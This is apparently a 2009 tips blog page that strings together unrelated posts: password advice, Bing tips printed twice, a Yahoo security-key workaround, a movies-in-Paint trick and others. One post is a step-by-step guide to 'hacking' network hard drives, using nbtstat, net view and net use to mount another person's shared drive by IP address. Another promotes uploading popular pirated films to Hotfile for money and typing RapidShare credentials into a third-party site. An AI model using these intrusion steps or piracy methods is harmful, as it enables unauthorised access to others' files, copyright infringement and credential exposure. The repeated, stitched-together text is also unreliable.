Saturday, August 22, 2009

Secure your password from hackers

Secure your password from 'hackers'

Today tip will help you to secure your computer from the access of professional hackers. There are some hacker’s breaks into your computer without using any impressive programming skills but trying to find words to guess as your password. Normally people use their name, house number, mobile number and word “password” as a password. If you have very simple password then a hacker can hack your computer very easily. To safe your computer from hackers there is a best way to create a tricky password. Here I will tell you some different type of tricks to make your password that can’t guess easily by any body.

Use the maximum characters in your password.

Always set the password using maximum characters length, because it is simple method, if your password is longer then it is very difficult to guess.

Use the combination of lower-case and upper case letters in your password.

Normally computer users use the lower case in password selection but it is best practice to use the combination of both (lower-case and upper case). So using different cases in your password makes it much more difficult to crack.

Use the combination of letters and numbers in your password.

When you mix both letters and numbers just like one letter and one number then your password is more incomprehensible.

Avoid using the name of your family members as password.

Always try to avoid the name of your child, spouse, city and country name as password, because if any body knows about your personal life’s details then they try to use these detail to guess your password.

Use any tools to create random password.

There are many third party tools are available to create the random password. You can create passwords containing a very difficult –to-guess collection of random characters with these tools.

Google or Bing just ask both!

Sometime this comes in u r Mind Should I try Microsoft’s beautiful search engine – Bing? Or should I stick to my all time favorite – Google? Torn between the two? In case you are, not to worry, now you have the option to ask them both together! Askboth.com is a new web 2.0 twin search engine for you, coupled with Google as well as Bing, keeping all that confusion at bay. This means, you can now easily search for information on both the search engines at the same time.
Askboth.com has the regular features of Content Search on the Web as well as Image Search. This can also work as a SEO tool for you to compare the results on both the sites. You could even add it to your browser as your default search engine.

So, all those who laid eyes on Bing and just couldn’t get enough, but also couldn’t let go of old pal Google, this seems like an appealing option.
Try it out to see if it tickles your fancy.

I ALSO ADDED SOME FIVE BING TIPS YOU SHOULD KNOW

1. IP Address Tracker

The Bing can verify any IP address and can tell you the name of the websites hosted on a particular IP address. To do that simply type,

IP:[ IP Address ]

The search result will display the sites hosted on that IP address.

2. Know More About Companies From The IE Favorites

You need Internet Explorer 8 for this. Searching for company stocks like ‘GOOG’ on Bing will automatically create a web slice which can then be added to the IE Favorites bar.


3. Search Results as RSS Feed

This is something that I have seen to be popular among most of the users on the net. An RSS Feed of a search result can get you a variety of articles/news from other sites. Bing supports this feature. Just add at the end of the result page URL and press Enter:

&format=rss

For example, if you search for ‘iPhone’, in the results URL, just add the above and press enter. You will be subscribed to a RSS feed containing iPhone keywords which will get updated automatically.

4. Remove the background Image on the Bing site

If you are not one of those eye-candy freaks, you can remove the background image on the Bing homepage. Instead of typing bing.com, you can navigate to the site using the following URL,

Bing


5. Links to MP3 Files and Doc Files

You can search for MP3 files or Doc files on Bing.
‘abcd contains:mp3′

where abcd is your search term. It will generate results with pages that contain mp3 files related to the search term. Similarly for Doc files, just replace the MP3 with doc.

v

Sometime this comes in u r Mind Should I try Microsoft’s beautiful search engine – Bing? Or should I stick to my all time favorite – Google? Torn between the two? In case you are, not to worry, now you have the option to ask them both together! Askboth.com is a new web 2.0 twin search engine for you, coupled with Google as well as Bing, keeping all that confusion at bay. This means, you can now easily search for information on both the search engines at the same time.
Askboth.com has the regular features of Content Search on the Web as well as Image Search. This can also work as a SEO tool for you to compare the results on both the sites. You could even add it to your browser as your default search engine.

So, all those who laid eyes on Bing and just couldn’t get enough, but also couldn’t let go of old pal Google, this seems like an appealing option.
Try it out to see if it tickles your fancy.

I ALSO ADDED SOME FIVE BING TIPS YOU SHOULD KNOW

1. IP Address Tracker

The Bing can verify any IP address and can tell you the name of the websites hosted on a particular IP address. To do that simply type,

IP:[ IP Address ]

The search result will display the sites hosted on that IP address.

2. Know More About Companies From The IE Favorites

You need Internet Explorer 8 for this. Searching for company stocks like ‘GOOG’ on Bing will automatically create a web slice which can then be added to the IE Favorites bar.


3. Search Results as RSS Feed

This is something that I have seen to be popular among most of the users on the net. An RSS Feed of a search result can get you a variety of articles/news from other sites. Bing supports this feature. Just add at the end of the result page URL and press Enter:

&format=rss

For example, if you search for ‘iPhone’, in the results URL, just add the above and press enter. You will be subscribed to a RSS feed containing iPhone keywords which will get updated automatically.

4. Remove the background Image on the Bing site

If you are not one of those eye-candy freaks, you can remove the background image on the Bing homepage. Instead of typing bing.com, you can navigate to the site using the following URL,

Bing


5. Links to MP3 Files and Doc Files

You can search for MP3 files or Doc files on Bing.
‘abcd contains:mp3′

where abcd is your search term. It will generate results with pages that contain mp3 files related to the search term. Similarly for Doc files, just replace the MP3 with doc.

How to hack network hard drives with command prompt

In this step by step guide you will learn about: How to Hack Network Hard Drives using the command prompt.
Things to remember

* CP = Command Prompt
* HDs = Hard Drives

Step by Step:
1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.
2. Once in command prompt type
c:\windows>nbtstat -a 203.195.136.156
(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.
3. Let say that it gives you this

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6



The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------

NOTE - If you do not get this number there are three possible answers

A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.

B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.
C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers
4. Now in command prompt type
c:\windows>net view \\203.195.136.156

Let's suppose we get the following output

Shared resources at \\203.195.136.156
The computer's name will be here

Share name Type Used as Comment

-------------------------------------------
CDISK Disk


The command completed successfully.
5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)
c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully

Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.

Continue to Hacking network printers with the command prompt

YAHOO SECURITY KEY....no credit card needed

A Yahoo Security Key will add an extra layer of protection to keep your Yahoo E-Mail Account and Screen Name safe from hackers and crackers.

What is a Yahoo! Security Key?
A Yahoo! Security Key is a personal access code (like

the PIN you use at the ATM) designed to protect your

most sensitive information displayed on Yahoo!.

First..go to this link:


Code:
http://help.yahoo.com/help/us/skey/skey-01.html


At the upper left hand corner of this page please note the area.."forgot security key".....click here

Now you are presented with a log in page...log in with your Yahoo ID you want to obtain a security key for.

Now..you will be ask once again to verify your password...do so.


You are now presented with a page noting the header:

Yahoo Security Key Sign Up

Choose A Security Key

Now..enter the security key you have chosen and verify it....[ hint..do not use your regular password as your security key ]


Now you are ask to select a secret question....then to supply an answer to the secret question
Please..use this example for security questions and answers:
Security Question..Favorite City
Security Question Answer:I like cheeto's..[ no one is going to guess this type of security question answer ]

Note your default e-mail address...[use a real e-mail address other than Yahoo]
Note your zip code and country..[it does not need to be your real zip code and may be differant than the one you have noted on your Yahoo account ].

Now..print out this page for future reference.

Now simply click the submit button.
Hint:if you get a "page cannot be displayed " message do not worry..simply use the "go back" feature of your browser.

You are now presented with a page asking you to verify your security key to continue..enter your security key and log in.

Here is the trick...You will receive a "page cannot be displayed message".. at this point....Do not worry..simply hit the go back feature of your browser.You will then receive a page asking you to enter your security key to continue.

Do not enter your security key at this time...simply go to the top of the page and click the Yahoo icon.You will now be directed to Yahoo's main page..and as you can see you are still logged in.

Click on the Yahoo Mail icon at the top of the Yahoo page.
Once in your mail account..click the account icon at the top of this page...enter your regular Yahoo password and you are now into your Yahoo account.

Please note at this time the area of this page that says"change password".
Look under this area.
Now you will also have a "Change your Security Key" notation here.

You now have a security key...and your Yahoo Account is for all practical purposes uncrackable and unhackable.

I know this must seem like a lot of work..but after you do it one time..you will see that is is really simple to do..and well worth doing to protect your Yahoo Account.

I do hope this is helpful to those of you who are concerned about the security of your Yahoo Account.Yes..we have played a little trick on Yahoo...but your account is now secure..and you did not need to use a credit card.

[TUTORIAL] Flooding Your Points To Earn Money On 'HOTFILE'

Previous Topic Got some issues .
So this is Just a repost.

All Credits GOES to > -- > WALL E




* Please Dont talk About Referal System Here *





This is a BASIC and VERY simple Guide.
The BEST part is that no matter What your Upload Speed is. It takes the same time for everyone. Why? (Explain Futher below).
The most important that to own a Premium Account on RapidShare or MegaUpload or NetLoad or MegaShares or ... HotFile.com is a file hosting site too, but if you have Premium Account on other file hosting site, you can remote upload as much files as you want (or as you bandwich have... [RS])



__________________


Step-1
Getting What's REQUIRED!



Go To :

Code:
http://hotfile.com/
And then Sign-Up for a Free Account.





Remote upload from RapidShare
Check for a Few Latest Movies/TV Show Episodes download links.
Make Sure that the Movies/TV Shows are Really Famous.



Now lets copy the download links...



Than go to the upload section HotFile's (Main site) and click to the Remote upload.




Paste the download links into Remote Upload section.



Do not click the upload button... yet.

Now you have to write into download links your RapidShare code. Do not affraid, HotFile isn't a scam site.



And now click the upload button.


Thaat's all. Now you have you HotFile download links. GO and share the link






Remote upload from RapidShare with Direct Link Generator

Go To This Site to make Direct Links:

Code:
http://rsdirectlinks.co.uk/
Copy-paste your RS downloading links, write your username and password and then "Get links"

Please make sure that u dont Enter ur ALIAS But Your Number ID As shown below.






You'll get the RapidShare Premium Links. Just copy-paste into your HotFile remote upload site and then it'll upload 'em.




_____________________________


Remote upload from MegaVideo

If you got it, and you have a MegaVideo Premium Account click the DOWNLOAD ORIGINAL button.



And copy the (direct) download link into HotFile's Remote upload section.





Aaaand...





Step-2
Making Your Movies/TV Shows Famous.
Post Ur Links as much as forums as u want

Step-3
Your statistics could be checked from here:

Code:
http://hotfile.com/mystats.html


After a few days of uploading I have $161,24. Not bad at all.

They Pay Every Monday :

Minimum Payout = 15 $

Payment method:
paypal
Webmoney
Epassport


If anyone facing problems , comment here !!

Watch Movies in Ms Paint!

Hey guys, did you know that you can watch movies in paint ? But u can't do anything (Just watch it while its playing in Media Player Classic, winamp or any other movie player you use.

Here's what you gotta do :

1.Open your favourite movie player and play the move (I played the .avi, format in Media Player Classic) (.mpg also works)

2.Hit "PrintScreen", keep playing the movie in the player, don't stop it.

3.Open MsPaint.

4.Select "Edit > Paste" Or Hit "CTRL+V"

You can watch movies in Paint!

But there are no Pause, Next, Previous, Stop etc. buttons

Experiment with other formats too, it doesn't play DivX , Flash movies.